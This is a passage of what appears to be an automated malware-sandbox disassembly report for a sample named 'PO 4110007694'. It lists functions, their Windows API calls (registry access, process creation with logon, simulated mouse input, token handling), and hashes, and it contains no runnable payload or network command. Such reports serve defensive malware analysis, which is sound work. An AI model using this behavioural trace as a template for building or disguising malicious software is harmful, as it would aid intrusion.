                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C39EB4
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C39EC7
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C39EDA
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C39EED
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C39F00
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00C39F13
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C39F26
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C39F39
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C39F4C
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C39F5F
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C39F72
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C39F85
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C39F98
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C39FAB
                                                                      • Part of subcall function 00C33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C39FBE
                                                                    • __mtinitlocks.LIBCMT ref: 00C39AEB
                                                                    • __mtterm.LIBCMT ref: 00C39AF4
                                                                      • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C56
                                                                      • Part of subcall function 00C39B5C: _free.LIBCMT ref: 00C39C5D
                                                                      • Part of subcall function 00C39B5C: DeleteCriticalSection.KERNEL32(00CCEC00,?,?,00C39AF9,00C37CD0,00CCA0B8,00000014), ref: 00C39C7F
                                                                    • __calloc_crt.LIBCMT ref: 00C39B19
                                                                    • __initptd.LIBCMT ref: 00C39B3B
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00C39B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 3567560977-0
                                                                    • Opcode ID: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                    • Instruction ID: 21335bf51572bd45c5bd0b4136331fc639afa94b1a9aae279165b38df670159a
                                                                    • Opcode Fuzzy Hash: 419ce02f8eda7c3b5ed27c55ac6dd523f17a96a48cd93009d6d091605c9d6385
                                                                    • Instruction Fuzzy Hash: 2BF09A32A397116AE6347B74BC07B8E7690DF02738F200A2AF461C60D2EFF0894161A0
                                                                    Function 00C3406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C33F85), ref: 00C34085
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00C3408C
                                                                    • EncodePointer.KERNEL32(00000000), ref: 00C34097
                                                                    • DecodePointer.KERNEL32(00C33F85), ref: 00C340B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 3489934621-2819208100
                                                                    • Opcode ID: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
                                                                    • Instruction ID: abce74a021f83dab232709fe7401bd8d369e0d4d24b2c653e0392e175223588b
                                                                    • Opcode Fuzzy Hash: 0f38b653ee5a7f62b327d4aef37953c0a614c461c34f259968bedb1fa41bec15
                                                                    • Instruction Fuzzy Hash: D0E09970A92252ABEA24AF65EC0DB0D3BA4BB04B46F10403AF111F10F0CBBA9601CA16
                                                                    Function 00C764B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 3253778849-0
                                                                    • Opcode ID: 9697d463feee39a83281399fe948489c232e0afe1169eebfa34589704d5d2305
                                                                    • Instruction ID: 04604ab667922bc0fffed6c63a3065e1bc0978a9118b36a620eb1ddc58e15797
                                                                    • Opcode Fuzzy Hash: 9697d463feee39a83281399fe948489c232e0afe1169eebfa34589704d5d2305
                                                                    • Instruction Fuzzy Hash: B5618C3190065A9BDF01EF60CC91EFE3BA9EF05308F448519F8596B192DB35E945FB50
                                                                    Function 00C901E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C902BD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C902FD
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C90320
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C90349
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9038C
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C90399
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                    • String ID:
                                                                    • API String ID: 4046560759-0
                                                                    • Opcode ID: def49c60f71afa052cea45e273fcb791d24ea0fe868ae69262010647fe91bb8b
                                                                    • Instruction ID: cb1689b1c1d403392f0deff67b21974f97448a37ecc781a1a47879fd206b49cf
                                                                    • Opcode Fuzzy Hash: def49c60f71afa052cea45e273fcb791d24ea0fe868ae69262010647fe91bb8b
                                                                    • Instruction Fuzzy Hash: 07514D31208204DFCB14EF64C889EAEBBE9FF85314F14491DF455872A2DB31EA45EB52
                                                                    Function 00C95799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00C957FB
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00C95832
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C9585A
                                                                    • GetMenuItemID.USER32(?,?), ref: 00C958C9
                                                                    • GetSubMenu.USER32(?,?), ref: 00C958D7
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00C95928
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: 20b8cca4d40050ec136a42cbf7a1082ca6196e0fce6da4cebbf464cba7ee9127
                                                                    • Instruction ID: b2606bb537dd488996a4b70ae88a04d0c45e652d691af1d147370759e2ddb51e
                                                                    • Opcode Fuzzy Hash: 20b8cca4d40050ec136a42cbf7a1082ca6196e0fce6da4cebbf464cba7ee9127
                                                                    • Instruction Fuzzy Hash: 46518031E00615EFDF11EF64C859AAEBBB4EF48310F104069E812BB391CB70AE42DB94
                                                                    Function 00C6EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00C6EF06
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00C6EF78
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00C6EFD3
                                                                    • _memmove.LIBCMT ref: 00C6EFFD
                                                                    • VariantClear.OLEAUT32(?), ref: 00C6F04A
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C6F078
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                    • String ID:
                                                                    • API String ID: 1101466143-0
                                                                    • Opcode ID: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                    • Instruction ID: 2a25cd8c6a8cf9a090aea358ec38e07fc6c0d35fd63a59400c1988ce8ded6bb6
                                                                    • Opcode Fuzzy Hash: c5ca9b3a85444bfad6d5e4c6063ac9624a33b0a147a6ccb47e3afed7c18a7fe4
                                                                    • Instruction Fuzzy Hash: 9B516D75A00209DFCB24CF58D884AAAB7B8FF4C314B15856EE959DB301E734E911CF90
                                                                    Function 00C7220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C72258
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C722A3
                                                                    • IsMenu.USER32(00000000), ref: 00C722C3
                                                                    • CreatePopupMenu.USER32 ref: 00C722F7
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00C72355
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C72386
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                    • Instruction ID: 4501b14afd8da46a016439b61f914d29a9f2916e1e58b8dc4eda28a2ac23d169
                                                                    • Opcode Fuzzy Hash: 531fffce25f8e70fe6c9637330b248ba01726a7ffcea0987a54ef1008293d227
                                                                    • Instruction Fuzzy Hash: 3C51A170600249DFDF25CF68D888BADBBF9FF45318F10C22AE869972A1D3749A45CB51
                                                                    Function 00C11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C1179A
                                                                    • GetWindowRect.USER32(?,?), ref: 00C117FE
                                                                    • ScreenToClient.USER32(?,?), ref: 00C1181B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C1182C
                                                                    • EndPaint.USER32(?,?), ref: 00C11876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 1827037458-0
                                                                    • Opcode ID: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                    • Instruction ID: 306f11e84f6d526cec73dd9144d55368ce7e2010bf187aa524f23c64f5e4e20c
                                                                    • Opcode Fuzzy Hash: fcfeb977d9557d34dad68541a120dbd144eacc93a3c78f08b677749312e8f6f9
                                                                    • Instruction Fuzzy Hash: 76419F71104700AFD710DF25CC88BAA7BE8FB46724F18462AFAA4C62E1C7349985EB61
                                                                    Function 00C9B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(00CD57B0,00000000,017B5A08,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B712
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00C9B736
                                                                    • ShowWindow.USER32(00CD57B0,00000000,017B5A08,?,?,00CD57B0,?,00C9B5A8,?,?), ref: 00C9B796
                                                                    • ShowWindow.USER32(00000000,00000004,?,00C9B5A8,?,?), ref: 00C9B7A8
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00C9B7CC
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C9B7EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
                                                                    • Instruction ID: a73812fee956039e546eb0aa1847542fafa68b19d280333964a2e60e8f683399
                                                                    • Opcode Fuzzy Hash: 1a67f6db947a06d8143b3e8d7f8fedc9bec728b3f8c48433788458fe5cf24a5e
                                                                    • Instruction Fuzzy Hash: 1C414F34600240BFDF26CFA4E59DB947BE1FF85310F1842A9E9588F6A2C731AD56CB61
                                                                    Function 00C8709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00C84E41,?,?,00000000,00000001), ref: 00C870AC
                                                                      • Part of subcall function 00C839A0: GetWindowRect.USER32(?,?), ref: 00C839B3
                                                                    • GetDesktopWindow.USER32 ref: 00C870D6
                                                                    • GetWindowRect.USER32(00000000), ref: 00C870DD
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C8710F
                                                                      • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                    • GetCursorPos.USER32(?), ref: 00C8713B
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C87199
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
                                                                    • Instruction ID: 8b5c81b3247372ff7625199fdeb93cb4889658cda93f1313f7f587f9feab2863
                                                                    • Opcode Fuzzy Hash: 4f25577af867f217957aa3a8e2754f65fea8f59b6a994fedeaa6d8a2d9b0320f
                                                                    • Instruction Fuzzy Hash: 6F31D272509305ABD720EF14C849B9FB7A9FF88314F100A2EF599D7191D670EA09CB96
                                                                    Function 00C68879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                      • Part of subcall function 00C680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                      • Part of subcall function 00C680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                      • Part of subcall function 00C680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                      • Part of subcall function 00C680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00C6842F), ref: 00C688CA
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C688D6
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00C688DD
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C688F6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00C6842F), ref: 00C6890A
                                                                    • HeapFree.KERNEL32(00000000), ref: 00C68911
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
                                                                    • Instruction ID: 466512cffad7afe3779ecd512423146be1a713b6abbfe99df24bec02af0c13e4
                                                                    • Opcode Fuzzy Hash: dbc8d2a63a117e18196140a5b6e8dc7092ca3bc778af2df0db463a4bf143bc6e
                                                                    • Instruction Fuzzy Hash: E411B131501209FFDB209FA4DC49BBE7768EB45311F10422EE895D7110CB329E19DB60
                                                                    Function 00C685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C685E2
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00C685E9
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C685F8
                                                                    • CloseHandle.KERNEL32(00000004), ref: 00C68603
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C68632
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C68646
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
                                                                    • Instruction ID: bc1a9d28906b1e17f46fa6fa3b99c1ac3b27126b8c84dd154812414fd47e76ff
                                                                    • Opcode Fuzzy Hash: 34150b4bb1248cdc472e057d7d0428870e47a9a2e63255bb1c527ac176389de3
                                                                    • Instruction Fuzzy Hash: 25115C72500209ABDF128FA4DD89BDE7BA9EF08344F044169FE05E2160C771CE65DB60
                                                                    Function 00C6B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00C6B7B5
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C6B7C6
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C6B7CD
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00C6B7D5
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C6B7EC
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00C6B7FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$Release
                                                                    • String ID:
                                                                    • API String ID: 1035833867-0
                                                                    • Opcode ID: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
                                                                    • Instruction ID: 245994fc5b8c9c62ec0e81377a31940e2e9792dfe2fd37758835d6f0fa29e806
                                                                    • Opcode Fuzzy Hash: 20f121ce859262df488d2d61bbae485b84aa926104b8d9390780cf6356d82d1d
